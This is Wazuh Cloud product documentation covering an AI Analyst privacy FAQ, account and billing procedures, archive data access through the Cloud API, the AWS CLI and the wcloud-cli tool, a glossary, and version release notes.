No, data from Wazuh Cloud subscriptions is not shared with third parties. Data is processed by AWS Bedrock and Anthropic's Claude model solely within the AI pipeline. It is not shared beyond that scope. Both providers follow strict data protection policies that prevent sharing of customer data with external parties.

Is data used to train AI models?

No, your data is not used to train AI models. Customer data is not used for model training or improvement, as stated in Anthropic's terms of service under AWS Bedrock. Data is only used to generate your security analysis reports and is not retained or used for any other purposes.

Can data leak to third parties?

The service implements multiple layers of security to prevent data leaks:

  • Encrypted data transmission.

  • Enterprise-grade security controls in AWS Bedrock.

  • Isolated processing environments for Claude.

  • No permanent data storage during processing.

  • Restricted access to authorized Wazuh service components only.

How should I use the recommendations in the AI Analyst report?

Treat AI-generated recommendations as advisory. Users are responsible for:

  • Reviewing and validating all AI-generated recommendations.

  • Acting based on internal security policies and risk assessments.

  • Consulting with security professionals when necessary.

The service is subject to the limitations and disclaimers outlined in AWS service terms (Section 50) and Anthropic's commercial terms of service

Service operations FAQ
How often are reports generated?

Reports are generated based on your Wazuh Cloud subscription and configuration settings.

Can I customize the analysis parameters?

Not currently. The service uses predefined parameters optimized for comprehensive security assessment.

What happens if the AI service is unavailable?

Report generation is paused during outages and resumes automatically when the service is restored.

How long are reports retained?

Reports remain available in the Wazuh Console per your subscription's data retention policy. Emails are sent to designated technical contacts and may be retained indefinitely.

What data is included in the analysis?

The analysis includes:

  • Security alerts and MITRE ATT&CK mappings

  • Vulnerability scan results

  • High-priority rule triggers

  • Endpoint activity patterns

  • Operating system and package vulnerability data

Can I opt out of the AI Analyst service?

Yes. You can disable the service through your Wazuh Cloud subscription settings. Contact your administrator or Wazuh Support for assistance.

Account and billing

This section describes the actions you can perform in your account using the Wazuh Cloud Console.

Edit user settings

You can edit your account preferences, such as email address and password from the Wazuh Cloud Console. You can also enable multi-factor authentication to increase security and see login method alternatives.

Configure your user profile

You can configure your name, last name, company name, country, phone number, and website.

  1. Log in to the Wazuh Cloud Console and click the upper-right user icon to open the menu.

  2. Go to User settings.

  3. Fill in or edit the fields. Company and Country are required in order to continue.

  4. Click Save to complete the action.

Update your email address

Each Wazuh Cloud account has a primary email associated with it. If needed, you can change this primary email address.

  1. Log in to the Wazuh Cloud Console and click the upper-right user icon to open the menu.

  2. Go to User settings.

  3. Click Email address.

  4. Enter a new email address and your current password, then click Save to confirm the action.

An email is sent to the new address with a link to confirm the change.

Change your Wazuh Cloud Console password

When you signed up for a Wazuh Cloud account with your email address, you selected a password that you use to log in to the console. If needed, you can change this password.

If you know your current password:

  1. Log in to the Wazuh Cloud Console and click the upper-right user icon to open the menu.

  2. Go to User settings.

  3. In Change password, enter the current password and provide the new password that you want to use.

  4. Click Save to confirm the action.

If you don’t know your current password:

  1. Click on Forgot my password on the login page of the Wazuh Cloud Console.

  2. Enter the primary email address for your account and click Reset password.

An email is sent to your address with a link to reset the password.

Enable multi-factor authentication

To add an extra layer of security to your Wazuh Cloud account, you can set up a Virtual MFA Device like Google authenticator.

To enable multi-factor authentication:

  1. Log in to the Wazuh Cloud Console and click the upper-right user icon to open the menu.

  2. Go to User settings.

  3. Under Multi-factor authentication, click Add MFA and follow the steps described in the Set up virtual MFA device pane.

  4. Click Enable MFA to complete the process.

If your device is lost or stolen, contact support through the Help section of the Wazuh Cloud Console.

Manage your billing details

To continue using your environment beyond the trial period, you need to add credit card details to your Wazuh Cloud account. Your credit card information is sent securely to our billing provider and stored with them.

Note

A trial environment is converted to a paid environment when the trial expires. If you do not add your credit card information before the expiration date, your environment is deleted, and all data is permanently erased. Make sure to add your credit card before the end of the trial period.

Add your billing details

To add the billing details:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select Billing.

  3. Select Add billing information in the Payment method section.

  4. Fill in the form with your billing details.

  5. Click Save to confirm the payment method.

You can stop upcoming charges by canceling your environments.

Note

Cancellation cannot be undone, all data will be permanently deleted.

Remove your billing details

You can only remove billing details when there are no active paid environments. This means either:

  • There are no environments.

  • The only active environment is in a trial period.

  • All the environments have been canceled.

In order to remove your billing information:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section, select Billing, and select Payment method.

  3. Select Delete in the Payment method. This button will be disabled if there is an active paid environment.

  4. Confirm Delete in the pop up.

See your billing cycle and history

Information about your current billing cycle, outstanding payments, and billing receipts is available from the Wazuh Cloud Console. The billing cycle is the period between the last billing date and the current billing date, while your billing history shows an overview of all invoices issued for your account.

To see your current billing cycle information:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select Summary under Billing.

You can see the details about the upcoming billing for your active environments under the current billing cycle.

To see your billing history:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section, select Billing and select Invoices.

  3. Click the invoice to download a PDF with your billing history details.

Update billing and operational contacts

You can specify billing and operational contacts in addition to the primary email address of your account.

Note

Billing and operational contacts are only for notification purposes, they cannot be used to log in to the Wazuh Cloud Console. To access the Wazuh Cloud Console, you must use the primary email address for your account.

To update billing and operational contacts:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select Contacts.

  3. Add or remove contacts from the desired category.

Multiple email addresses can be specified for each category. They become effective immediately and no further confirmation from the email addresses is required.

Stop charges for an environment

You can always cancel an environment you no longer need. When performing this action, the environment is removed at the end of the billing cycle, with no new or additional charges incurred.

To stop being charged for an environment:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Environments page and select the environment you want to cancel.

  3. Click Cancel environment and confirm the cancellation.

Warning

Cancellation cannot be undone, and all data is permanently deleted with this action.

Billing FAQ
When is my credit card charged?

Each environment is charged monthly, according to the environment's beginning date.

Is my credit card information safe?

Your credit card information is sent securely to our billing provider, Stripe, and stored there.

Where can I see the next payment for an environment?

Go to the See your billing cycle and history section to learn how to view the billing details of your environments.

What happens to my payments if I want to upgrade or downgrade a setting?

If you choose to upgrade a setting, you need to make an immediate prorated payment. The upgrade becomes effective immediately, albeit leading to an increased price for your environment. Conversely, when downgrading a setting, the change takes effect in the subsequent billing cycle, with your price adjusted accordingly. See Adjusting environment settings for further details.

How do I view previous receipts and billing history?

Go to the See your billing cycle and history section to learn how to download an overview of all invoices issued for your account.

How can I configure who receives receipts and billing notifications?

Go to Update billing and operational contacts section to learn how to configure who receives receipts and billing notifications.

What are the available payment methods on Wazuh Cloud?

Credit or debit card payments are supported. To learn more about Wazuh supported cards, see the certified payment processor list of card brands in the Stripe documentation.

Can I get a refund?

Charges are nonrefundable, but if you want to cease using an environment, you can cancel your environment anytime. No new charges are incurred beyond the current billing period. For any special considerations regarding a refund, contact us through the Help section of the Wazuh Cloud Console.

What is included in my Wazuh Cloud environment?

A full set-up of Wazuh, according to your setting, and a standard or premium support service.

How can I request more information?

You can contact the Wazuh team anytime through the Help section on your Wazuh Cloud Console.

Archive data

Wazuh provides two types of storage for your data:

  • Indexed data

  • Archive data

When Wazuh ingests and indexes events from agents, the data becomes searchable and analyzable in the Wazuh dashboard. This information is stored in indexed data, which is limited by your indexed data retention and indexed data capacity (formerly known as tier) settings. Simultaneously, the data is sent to archive data with a maximum delay of 30 minutes after initial processing by Wazuh. Archive data is stored in an AWS S3 bucket, allowing you to store logs for extended periods and meet compliance requirements. Additionally, you can reindex the data to other environments for further investigations.

Environment example for data storage

This example environment is configured with the following settings:

  • Indexed data retention: 3 months

  • Indexed data capacity (formerly known as tier): 100 GB

  • Archive data: 1 year

Assuming that Wazuh ingests 5GB of data daily, with 20% of events generating alerts, it indexes 1GB per day. In this scenario, the indexed data can retain alerts for up to 100 days (1GB per day - 100GB), but it will be rotated to maintain only 3 months of data as specified in the indexed data retention setting. However, all information from the past year is still accessible in the archive data according to the archive data setting.

This configuration ensures that recent alerts are readily available in the indexed data, while older data is securely stored in the archive data for compliance and historical purposes.

For more information about the archive data feature in the Wazuh Cloud service, please refer to the following sections:

Configuration

Your environment is configured by default to send Wazuh output files to archive data.

There are two Wazuh output files in JSON format:

  • /var/ossec/logs/archives/archives.json: If you set logall_json to yes, Wazuh stores all events in this file and sends it to archive data, regardless of whether they triggered an alert.

  • /var/ossec/logs/alerts/alerts.json: This file contains only events that tripped a rule with high enough priority, according to a configurable threshold. This is always sent to archive data.

Both files are delivered to archive data as soon as they are rotated and compressed. This process usually takes between 10 and 30 minutes from the moment the event is received.

The oldest files in the archive data are rotated based on the archive data setting.

Note

Files with a .log extension are never sent to archive data.

Filename format

The files are stored in a directory structure that indicates the date and time the file was delivered to the archive data.

The main path follows this format:

wazuh-cloud-cold-<REGION>/<CLOUD_ID>/<CATEGORY>[/<SUBCATEGORY>]/<YEAR>/<MONTH>/<DAY>

Each file has the following name:

<CLOUD_ID>_<CATEGORY>[_<SUBCATEGORY>]_<YYYYMMDDTHHmm>_<UniqueString>.<FORMAT>

The files include the following fields:

field

Description

<REGION>

The region where the environment is located.

<CLOUD_ID>

Cloud ID of the environment.

<CATEGORY>

This field must be output.

<SUBCATEGORY>

This field is only used by the output category and contains alerts or archives files.

<YEAR>

The year when the file was delivered.

<MONTH>

The month when the file was delivered.

<DAY>

The day when the file was delivered.

<YYYYMMDDTHHmm>

Digits of the year, month, day, hour, and minute when the file was delivered. Hours are in 24-hour format and in UTC. A log file delivered at a specific time can contain records written at any point before that time.

<UniqueString>

The 16-character UniqueString component of the file name prevents overwriting files. It has no meaning and log processing software should ignore it.

<FORMAT>

It is the encoding of the file. This field is json.gz for output files, which is a JSON text file in compressed gzip format, and tar.gz for configuration files.

Access

To access your archive data, you need an AWS token that grants permission on the AWS S3 bucket of your environment. This token can be generated using the Wazuh Cloud API.

Note

See the Wazuh Cloud CLI section to learn how to list and download your archive data automatically.

Getting your API key and the AWS token
  1. Obtain your Wazuh Cloud API key by following the steps outlined in the API Authentication section.

  2. Use the POST /storage/token API endpoint with your key to get a temporary AWS token. For example, the following request generates an AWS token valid for 3600 seconds that grants access to the environment archive data with ID 012345678ab.

    curl -XPOST https://api.cloud.wazuh.com/v2/storage/token -H "x-api-key: <YOUR_API_KEY>" -H "Content-Type: application/json" --data '
    {
       "environment_cloud_id": "012345678ab",
       "token_expiration": "3600"
    }'
    
    {
       "environment_cloud_id": "012345678ab",
       "aws": {
          "s3_path": "wazuh-cloud-cold-us-east-1/012345678ab",
          "region": "us-east-1",
          "credentials": {
             "access_key_id": "mUdT2dBjlHd...Gh7Ni1yZKR5If",
             "secret_access_key": "qEzCk63a224...5aB+e4fC1BR0G",
             "session_token": "MRg3t7HIuoA...4o4BXSAcPfUD8",
             "expires_in": 3600
          }
       }
    }
    
Generating the AWS wazuh_cloud_storage profile

Add the token to the AWS credentials file ~/.aws/credentials.

[wazuh_cloud_storage]
aws_access_key_id = mUdT2dBjlHd...Gh7Ni1yZKR5If
aws_secret_access_key = qEzCk63a224...5aB+e4fC1BR0G
aws_session_token = MRg3t7HIuoA...4o4BXSAcPfUD8
Listing archive data

This command lists the archive data files of the environment 012345678ab.

# aws --profile wazuh_cloud_storage --region us-east-1 s3 ls --recursive s3://wazuh-cloud-cold-us-east-1/012345678ab/
2024-04-19 17:50:06        493 012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz
2024-04-19 18:00:05      77759 012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2100_kdBY42OvE9QJuiia.json.gz
Examples
Downloading archive data – Multiple files

This command downloads the archive data files of the environment 012345678ab into the /home/test/ directory.

# aws --profile wazuh_cloud_storage --region us-east-1 s3 cp --recursive s3://wazuh-cloud-cold-us-east-1/012345678ab/ /home/test/
download: s3://wazuh-cloud-cold-us-east-1/012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz to output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz
download: s3://wazuh-cloud-cold-us-east-1/012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2100_kdBY42OvE9QJuiia.json.gz to output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2100_kdBY42OvE9QJuiia.json.gz
Downloading archive data – Single file

This command downloads the 012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz file of the environment 012345678ab into the directory /home/test.

# aws --profile wazuh_cloud_storage --region us-east-1 s3 cp --recursive s3://wazuh-cloud-cold-us-east-1/012345678ab/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz /home/test/
download: s3://wazuh-cloud-cold-us-east-1/012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz to ./012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz
Wazuh Cloud API

Wazuh Cloud provides a Wazuh Cloud API that allows you to perform some operations with your cloud environments, such as downloading archive data.

This section provides information on the following:

Authentication

Wazuh Cloud supports only API key-based authentication.

To obtain a Wazuh Cloud API key:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select API Keys.

  3. Click Generate API Key.

  4. Provide a name and click Generate API key.

  5. Copy the generated API key and store it in a safe place.

Note

The API key has no expiration date, so it can be used indefinitely. You might also have multiple API keys for different purposes, and you can revoke them when you no longer need them.

To revoke an API key:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select API Keys.

  3. Click the trash icon under the Revoke column for any API key you want to delete.

  4. Click Revoke Api key to confirm the action.

The deleted API is removed from the list of API keys.

Reference
CLI

The Wazuh Cloud Command Line Interface (wcloud-cli) is a tool that allows you to interact with Wazuh Cloud using commands in your command-line shell.

Requirements

To use wcloud-cli, you need to install the following components:

  • Python 3.x

  • boto3 Python package

  • requests Python package

Installation
  1. Use the following command to download the CLI tool.

    # curl -so ~/wcloud-cli https://packages.wazuh.com/resources/cloud/wcloud-cli && chmod 500  ~/wcloud-cli
    
  2. Run it with the version argument to confirm that the installation was successful.

    # ./wcloud-cli version
    
    Wazuh Cloud CLI - "version": "1.0.1"
    
Configuration

You can configure the settings that the Wazuh Cloud CLI (wcloud-cli) uses to interact with Wazuh Cloud.

By default, the Wazuh Cloud CLI reads the credential information from a local file named credentials, located in the .wazuh-cloud folder of your home directory. The location of your home directory varies based on the operating system, but you can find it using the environment variables %UserProfile% in Windows, and $HOME or ~ (tilde) in Unix-based systems.

A non-default location can be specified for the config file by setting the WAZUH_CLOUD_CREDENTIALS_FILE environment variable to another local path.

  1. Create the credentials file and add your API key.

    # touch ~/.wazuh-cloud/credentials
    
    [default]
    wazuh_cloud_api_key_name = Test
    wazuh_cloud_api_key_secret = MDAwMDAwMDQ2T047Q4JVY1Sm5dDOqpDtkCQiY89fHjuZT3c90zs2
    

    The file is organized in profiles, a collection of credentials. When you specify a profile to run a command, the credentials are used to run that command. You can specify one default profile that is used when no profile is explicitly referenced.

  2. Use the following command to test your credentials. Optionally, you can specify the profile.

    # wcloud-cli test-credentials --profile <PROFILE_NAME>
    
    The API key 'Test' in the profile 'default' is valid.
    
Examples
Getting S3 token for archive data

This command generates an AWS token to access the archive data of the environment with Cloud ID 012345678ab.

# wcloud-cli cold-storage get-aws-s3-token 012345678ab
Environment Cloud ID: '012345678ab'
Region: 'us-east-1'
S3 path: 'wazuh-cloud-cold-us-east-1/012345678ab'

The following AWS credentials will be valid until 2024-04-22 13:55:27:
[wazuh_cloud_storage]
aws_access_key_id = A...M
aws_secret_access_key = L...0
aws_session_token = F...Q==
Listing archive data

This command lists the archive data files of the environment 012345678ab between the specified dates.

# wcloud-cli cold-storage list 012345678ab --start 2021-05-07 --end 2021-05-07
Environment '012345678ab' files from 2021-05-07 to 2021-05-07:
012345678ab/output/alerts/2021/05/07/012345678ab_output_alerts_20210507T1040_mXSoDTf5Pgyr8b8D.json.gz
Downloading archive data

This command downloads in the /home/test directory the archive data files of the environment 012345678ab between the specified dates.

# wcloud-cli cold-storage download 012345678ab /home/test --start 2021-05-07 --end 2021-05-07
Environment '012345678ab' files from 2021-05-07 to 2021-05-07:
Downloading object 012345678ab/output/alerts/2021/05/07/012345678ab_output_alerts_20210507T1040_mXSoDTf5Pgyr8b8D.json.gz
Downloaded object 012345678ab/output/alerts/2021/05/07/012345678ab_output_alerts_20210507T1040_mXSoDTf5Pgyr8b8D.json.gz
Glossary

Here is a list of terms related to Wazuh Cloud.

Cloud Console

The Wazuh Cloud Console provides web-based access to manage your Wazuh Cloud environments.

Cloud ID

The Cloud ID is a unique ID for your environment on Wazuh Cloud. It is used for multiple purposes, such as Wazuh WUI access or the agent registration process.

Environment

An environment is a deployment that contains all the Wazuh components ready to use and running on Wazuh Cloud.

Archive data

Formerly known as cold storage, it's the data containing the output generated by Wazuh, such as alerts and archives. It's an AWS S3 bucket to store your logs for a longer time and meet compliance requirements.

Indexed data

Formerly known as hot storage, it's the data available on the Wazuh dashboard corresponding to the information indexed by Wazuh. This information is available as soon as Wazuh ingests and indexes the events sent by the agents, making the data searchable and analyzable.

Indexed data is calculated using the primary shards of wazuh-* indices.

Tier

The concept of a tier, which represents the size limitation, in bytes, of the indexed data (formerly known as hot storage), is no longer used. It has been replaced by the indexed data capacity setting.

Setting

In the context of Wazuh Cloud, a setting refers to each configuration option available for a cloud environment. These settings determine the limitations, functionalities, and pricing of an environment.

Profile

A profile refers to predefined settings that you can choose from when configuring your Wazuh Cloud environment. We have three profiles available: Small, Medium, and Large. These profiles are designed to simplify the process by providing preconfigured settings that cater to different needs and requirements. If none of the predefined profiles meet your specific requirements, you can configure your settings individually.

Region

A region is a geographic area where the data center of the cloud provider that hosts your environment is located. The region you select cannot be changed after you create an environment. If you are not sure what to pick, choose a region that is geographically close to you to reduce latency.

Available regions:

Asia Pacific

  • Tokyo: ap-northeast-1

  • Mumbai: ap-south-1

  • Singapore: ap-southeast-1

  • Sydney: ap-southeast-2

Europe

  • Frankfurt: eu-central-1

  • London: eu-west-2

North America

  • Canada: ca-central-1

  • North Virginia: us-east-1

  • Ohio: us-east-2

Wazuh Cloud API

The Wazuh Cloud API is an application programming interface used to interact with Wazuh Cloud. The Wazuh Cloud API is used, for example, to provide access to an environment's archive data.

Wazuh Cloud CLI

The Wazuh Cloud Command Line Interface is a tool that enables you to interact with Wazuh Cloud using commands in your command-line shell.

Development

This section of the documentation helps developers to understand Wazuh at the development level. It provides the technical resources required to understand the Wazuh architecture, extend its capabilities, and tailor the platform to specific operational requirements.

Release notes

This section summarizes the most important features of each Wazuh release.

Wazuh version

Release date

5.0.0

TBD

4.14.3

TBD

4.14.2

TBD

4.14.1

12 November 2025

4.14.0

23 October 2025

4.13.1

24 September 2025

4.13.0

18 September 2025

4.12.0

7 May 2025

4.11.2

1 April 2025

4.11.1

12 March 2025

4.11.0

20 February 2025

4.10.3

19 August 2025

4.10.2

22 May 2025

4.10.1

16 January 2025

4.10.0

9 January 2025

4.9.2

4 November 2024

4.9.1

17 October 2024

4.9.0

5 September 2024

4.8.2

20 August 2024

4.8.1

18 July 2024

4.8.0

12 June 2024

4.7.5

30 May 2024

4.7.4

29 April 2024

4.7.3

4 March 2024

4.7.2

10 January 2024

4.7.1

20 December 2023

4.7.0

27 November 2023

4.6.0

31 October 2023

4.5.4

23 October 2023

4.5.3

10 October 2023

4.5.2

6 September 2023

4.5.1

24 August 2023

4.5.0

10 August 2023

4.4.5

10 July 2023

4.4.4

13 June 2023

4.4.3

25 May 2023

4.4.2

18 May 2023

4.4.1

12 April 2023

4.4.0

28 March 2023

4.3.11

24 April 2023

4.3.10

16 November 2022

4.3.9

13 October 2022

4.3.8

19 September 2022

4.3.7

24 August 2022

4.3.6

20 July 2022

4.3.5

29 June 2022

4.3.4

8 June 2022

4.3.3

1 June 2022

4.3.2

30 May 2022

4.3.1

18 May 2022

4.3.0

5 May 2022

4.2.7

30 May 2022

4.2.6

28 March 2022

4.2.5

15 November 2021

4.2.4

20 October 2021

4.2.3

6 October 2021

4.2.2

28 September 2021

4.2.1

3 September 2021

4.2.0

25 August 2021

4.1.5

22 April 2021

4.1.4

25 March 2021

4.1.3

23 March 2021

4.1.2

8 March 2021

4.1.1

25 February 2021

4.1.0

15 February 2021

4.0.4

14 January 2021

4.0.3

30 November 2020

4.0.2

24 November 2020

4.0.1

11 November 2020

4.0.0

23 October 2020

3.13.6

19 September 2022

3.13.5

24 August 2022

3.13.4

30 May 2022

3.13.3

28 April 2021

3.13.2

22 September 2020

3.13.1

15 July 2020

3.13.0

22 June 2020

3.12.3

30 April 2020

3.12.2

9 April 2020

3.12.1

8 April 2020

3.12.0

24 March 2020

3.11.4

25 February 2020

3.11.3

28 January 2020

3.11.2

22 January 2020

3.11.1

10 January 2020

3.11.0

23 December 2019

3.10.2

23 September 2019

3.10.1

19 September 2019

3.10.0

18 September 2019

3.9.5

8 August 2019

3.9.4

7 August 2019

3.9.3

9 July 2019

3.9.2

10 June 2019

3.9.1

21 May 2019

3.9.0

2 May 2019

3.8.2

31 January 2019

3.8.1

24 January 2019

3.8.0

18 January 2019

3.7.2

17 December 2018

3.7.1

5 December 2018

3.7.0

10 November 2018

3.6.1

7 September 2018

3.6.0

29 August 2018

3.5.0

10 August 2018

3.4.0

24 July 2018

3.3.1

18 June 2018

3.3.0

8 June 2018

3.2.4

1 June 2018

3.2.3

28 May 2018

3.2.2

7 May 2018

3.2.1

2 March 2018

3.2.0

8 February 2018

3.1.0

22 December 2017

3.0.0

3 December 2017

2.1.0

17 August 2017

5.x

This section summarizes the most important features of each Wazuh 5.x release.

Wazuh version

Release date

5.0.0

TBD

5.0.0 Release notes - TBD

This section lists the changes in version 5.0.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights
Breaking changes
What's new

This release includes new features or enhancements as the following:

  • #7827 Added default notification channels through the health check.

  • #7597 Added sample data generators for agent monitoring and server statistics.

  • #7662 Added "form-data": "^4.0.4" to the resolutions section to enforce the required dependency version.

  • #7694 Added prompts to views related to Server API connectivity and alerts index pattern issues.

  • Added a Not applicable status to the SCA CheckResult enum, including color mapping (#B9A888) and sample data support.

  • #7833 Added alerting sample monitors to the health check.

  • #7917, #7975, #7990, #7994 Added the Normalization application.

  • #7924 Added the default wazuh-events* index pattern.

  • #7839 Adapted alerts sample data to the Wazuh Common Schema.

  • #7688 Set cluster mode as the default for all Wazuh installations, including single-node deployments, and updated RBAC permissions to cluster:* actions.

  • #7578, #7929, #7974, #7979 Reworked SCA module visualizations, enabled global details for all agents without pinning, replaced the /sca endpoint with the wazuh-states-sca-* index pattern, and added sample data support.

  • #7604 Split the FIM registry inventory into two index patterns and updated fields in FIM file and registry sample data.

  • #7622, #7694, #7756, #7829 Reworked the health check.

  • #7622 Reworked several view components to use data sources.

  • #7754 Fixed date and format errors across multiple views.

  • #7812 Upgraded the brace-expansion dependency to versions 1.1.12 and 2.0.2.

  • #7812 Upgraded the tar-fs dependency to version 2.1.4.

  • #7871 Migrated wazuh.yml settings to opensearch_dashboards.yml and advanced settings.

  • #7871 Changed sample data index names.

  • #7900 Reworked the Generate report button.

  • #7842, #7847, #7916, #7938 Changed the dashboard renderer to use saved objects.

  • #7934 Changed the rule.groups filter to wazuh.integration.decoders.

  • #7981 Applied the new home page navigation style to all dashboards.

  • #7688 Removed manager-specific logic in favor of cluster-based management.

  • #7597 Removed backend monitoring and statistics jobs.

  • #7597, #7698 Removed monitoring and statistics job settings from the configuration.

  • #7597 Removed the prompt related to disabled statistics jobs in the Statistics application.

  • #7612 Removed configuration for modules relying on deprecated daemons: wazuh-agentlessd, wazuh-csyslogd, wazuh-dbd, wazuh-integratord, wazuh-maild, and wazuh-reportd.

  • #7645 Removed deprecated modules: OpenSCAP, CIS-CAT, and Osquery.

  • #7622 Removed the /health-check and /blank-screen frontend routes.

  • #7622 Removed the Miscellaneous section from App Settings.

  • #7622 Removed deprecated health check and customization settings.

  • #7871 Removed legacy customization, alerts sample, and UI API editable settings.

  • #7871 Removed the App Settings application.

  • #7871 Removed GET /elastic/alerts and /utils/configuration* endpoints.

  • #7871 Removed tasks related to custom logo sanitization and reports directory migration.

  • #7901 Removed the Rules, Decoders, CDB List, and Ruleset test applications.

  • #7899 Removed the legacy reporting application, including server routes, UI, PDF generation logic, and related customization settings.

  • #7932 Removed several sections from Server Management > Settings and agent configuration.

  • #7933 Removed the wazuh-alerts* index pattern and replaced it with wazuh-events* as the default. Index pattern selection is now handled per module.

  • #7933 Removed deprecated ip.ignore and pattern settings.

  • #7977 Removed references to alerts and archives templates.

  • #7857, #7868, #7891, #7982 Removed indexer resource files from the source code and dependency installation process.

Resolved issues

This release resolves known issues as the following:

  • #7923 Fixed a hardcoded version value in the Deploy agent wizard.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.x

This section summarizes the most important features of each Wazuh 4.x release.

Wazuh version

Release date

4.14.3

TBD

4.14.2

TBD

4.14.1

12 November 2025

4.14.0

23 October 2025

4.13.1

24 September 2025

4.13.0

18 September 2025

4.12.0

7 May 2025

4.11.2

1 April 2025

4.11.1

12 March 2025

4.11.0

20 February 2025

4.10.3

19 August 2025

4.10.2

22 May 2025

4.10.1

16 January 2025

4.10.0

9 January 2025

4.9.2

4 November 2024

4.9.1

17 October 2024

4.9.0

5 September 2024

4.8.2

20 August 2024

4.8.1

18 July 2024

4.8.0

12 June 2024

4.7.5

30 May 2024

4.7.4

29 April 2024

4.7.3

4 March 2024

4.7.2

10 January 2024

4.7.1

20 December 2023

4.7.0

27 November 2023

4.6.0

31 October 2023

4.5.4

23 October 2023

4.5.3

10 October 2023

4.5.2

6 September 2023

4.5.1

24 August 2023

4.5.0

10 August 2023

4.4.5

10 July 2023

4.4.4

13 June 2023

4.4.3

25 May 2023

4.4.2

18 May 2023

4.4.1

12 April 2023

4.4.0

28 March 2023

4.3.11

24 April 2023

4.3.10

16 November 2022

4.3.9

13 October 2022

4.3.8

19 September 2022

4.3.7

24 August 2022

4.3.6

20 July 2022

4.3.5

29 June 2022

4.3.4

8 June 2022

4.3.3

1 June 2022

4.3.2

30 May 2022

4.3.1

18 May 2022

4.3.0

5 May 2022

4.2.7

30 May 2022

4.2.6

28 March 2022

4.2.5

15 November 2021

4.2.4

20 October 2021

4.2.3

6 October 2021

4.2.2

28 September 2021

4.2.1

3 September 2021

4.2.0

25 August 2021

4.1.5

22 April 2021

4.1.4

25 March 2021

4.1.3

23 March 2021

4.1.2

8 March 2021

4.1.1

25 February 2021

4.1.0

15 February 2021

4.0.4

14 January 2021

4.0.3

30 November 2020

4.0.2

24 November 2020

4.0.1

11 November 2020

4.0.0

23 October 2020

4.14.3 Release notes - TBD

This section lists the changes in version 4.14.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Resolved issues

This release resolves known issues as the following:

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.14.2 Release notes - TBD

This section lists the changes in version 4.14.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh agent
  • #33313 Added detection of the -a never,task Audit rule in FIM whodata for Linux.

Ruleset
  • #32856 Added SCA policy for Microsoft Windows Server 2025.

Other
  • #33069 Upgraded the starlette dependency to 0.49.1.

Wazuh dashboard
  • #7883 Added persistence for page size and sorting in API tables.

  • #7878 Improved text size consistency and visual hierarchy across the Agent Overview page by implementing standardized typography styling.

  • #7896 Improved Agent Overview resilience by rendering each available system inventory field.

  • #7897 Upgraded cookie dependency to 0.7.0.

  • #7963 Removed the SCA Agent card subtitle.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #33046 Prevented Azure Log Analytics bookmarks from being overwritten across similar configurations.

  • #33330 Fixed discrepancy in the API certificate files.

  • #33589 Made analysisd ruleset reload endpoints fully asynchronous to avoid blocking the API event loop.

  • #33580 Improved analysisd ruleset hot reload performance.

  • #33602 Avoided using systemctl in restart scripts when systemd is not running as PID 1.

Wazuh agent
  • #33171 Fixed Windows agent remote upgrade (WPK) when installed in a custom directory.

  • #33182 Fixed a package issue causing upgrades to fail when the shared directory contained subdirectories.

  • #33270 Fixed FIM issue preventing whodata from working on systems with /var and /etc mounted on different volumes.

  • #33322 Optimized user and group inventory performance in Syscollector on Windows Domain Controllers.

  • #33227 Fixed an agent bug that prevented directories from being received in the remote configuration.

  • #33343 Silenced agent log message about failing to connect to Active Response when it is disabled.

Ruleset
  • #33202 Fixed bug in multiple macOS SCA checks.

  • #33361 Fixed indentation issue in the SCA policy for Windows 10 Enterprise that prevented its execution.

Wazuh dashboard
  • #7883 Removed sorting for Program name and Order columns in the Related decoders table, and the Groups column in the Related rules table, to prevent API errors.

  • #7962 Fixed text alignment and column distribution in the System inventory card within the Agent view.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.14.1 Release notes - 12 November 2025

This section lists the changes in version 4.14.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #32009 Added IAM role support for VPC flow logs in the AWS wodle.

  • #32514 Added support for static and temporary AWS credentials in the Amazon Security Lake subscriber.

  • #32401 Optimized wazuh-db startup by executing agent schema creation in a single transaction.

  • #32463 Improved vulnerabilities index upgrade with hash-based mapping validation, automatic safe reindex, and backup cleanup.

  • #32069 Improved C++ logging mechanism to avoid unnecessary heap allocations.

  • #32521 Improved IndexerConnector error handling and response parsing to provide structured logging of 4xx/5xx errors.

  • #32525 Reduced default verbosity of wazuh-authd when handling invalid connections.

  • #32697 Remoted now reads internal options at process startup.

Wazuh agent
  • #32746 Added support for Homebrew 2.0+ in IT Hygiene for macOS.

  • #31080 Changed how the fim_check_ignore function works in negative regex cases.

  • #31375 Changed how null values for hotfixes are handled in the Windows agent.

  • #32874 Improved service shutdown procedure.

Ruleset
